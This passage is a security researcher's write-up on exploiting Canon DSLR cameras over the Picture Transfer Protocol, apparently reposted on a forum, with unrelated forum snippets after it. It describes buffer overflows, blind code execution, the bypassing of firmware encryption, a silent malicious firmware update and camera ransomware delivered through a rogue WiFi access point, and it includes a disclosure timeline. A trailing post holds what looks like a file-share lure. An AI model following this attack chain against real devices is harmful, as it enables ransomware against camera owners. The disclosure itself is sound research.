arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands. Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze. Soon enough, we found our first vulnerability. CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C PTP Command Name: SendObjectInfo PTP Command Opcode: 0x100c Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code: Figure 5 – Vulnerable code snippet from the SendObjectInfo handler. This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the pKeywordsStringUnicode field into an arbitrary value, and later trigger a call to free it. This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit. CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9 PTP Command Name: NotifyBtStatus PTP Command Opcode: 0x91F9 Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6. Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler. Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest. CVE-2019-5999– Buffer Overflow in BLERequest – 0x914C PTP Command Name: BLERequest PTP Command Opcode: 0x914C It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7. Figure 7 – Vulnerable code snippet from the BLERequest handler. We now have 3 similar vulnerabilities: Buffer Overflow over a global structure. Buffer Overflow over the stack. Buffer Overflow over the heap. As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest. Gaining Code Execution We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup. Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.” Figure 8 – Crash screen we received when we tested our exploit PoCs. Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development. Basic recap of our tools thus far: Our camera has no debugger or ML on it. The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started. Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless. Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it. We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution. Loading Scout Scout is my goto debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we can use a file loader that will load Scout from the SD Card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for them both. After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi. We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth. We went back to the drawing-board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities. CVE-2019-6000– Buffer Overflow in SendHostInfo – 0x91E4 PTP Command Name: SendHostInfo PTP Command Opcode: 0x91E4 Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance. Figure 9 – Vulnerable code snippet from the SendHostInfo handler. This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial. Illegal packets will only be logged, but not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊 Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command. CVE-2019-6001– Buffer Overflow in SetAdapterBatteryReport – 0x91FD PTP Command Name: SendAdapterBatteryReport PTP Command Opcode: 0x91FD Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler. Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler. In this case, the stack buffer is rather small, so we will continue using the previous vulnerability. Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection. Loading Scout – Second Attempt Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process. But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware. Time for some Crypto Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go. This reverse engineering task went much better that we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting back a malicious firmware update and then signing it so it will pass the verification checks. Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know what are the correct signatures for each part in the firmware update file, effectively gaining a signing primitive by the camera itself. Since we only have one camera, this was a tricky part. We want to test our own custom home-made firmware update file, but we don’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper. Figure 11 – Image of our customized ROM Dumper, using our header. CVE-2019-5995 – Silent malicious firmware update: There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file. Wrapping it up After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user. Chaining everything together requires the attacker to first set-up a rogue WiFi Access Point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect. Once the attacker is within the same LAN as the camera, he can initiate the exploit. Here is a video presentation of our exploit and ransomware. Disclosure Timeline 31 March 2019 – Vulnerabilities were reported to Canon. 14 May 2019 – Canon confirmed all of our vulnerabilities. From this point onward, both parties worked together to patch the vulnerabilities. 08 July 2019 – We verified and approved Canon’s patch. 06 August 2019 – Canon published the patch as part of an official security advisory. Canon’s Security Advisory Here are the links to the official security advisory that was published by Canon: Japanese: https://global.canon/ja/support/security/d-camera.html English: https://global.canon/en/support/security/d-camera.html We strongly recommend everyone to patch their affected cameras. Conclusion During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well. Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and wide-spread consumer audience makes cameras a lucrative target for attackers. A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers. Sursa: https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
  44. 2 points
  45. 2 points
    Cred ca ar fi util sa mentionezi si orasul.
  46. 2 points
    test@test.test sent you some files 1 item, 169 MB in total ・ Will be deleted on 30 July, 2019 Get your files Download link https://wetransfer.com/downloads/f1a7756d8ff3300a89da3a76b977064b20190723135146/e81e643cb5ace3adea53345997d661fc20190723135146/e35771 1 item САЙТЭК.zip 169 MB
  47. 2 points
    Daca ti-ai cumparat si camera buna te poti apuca de videochat.
×
×
  • Create New...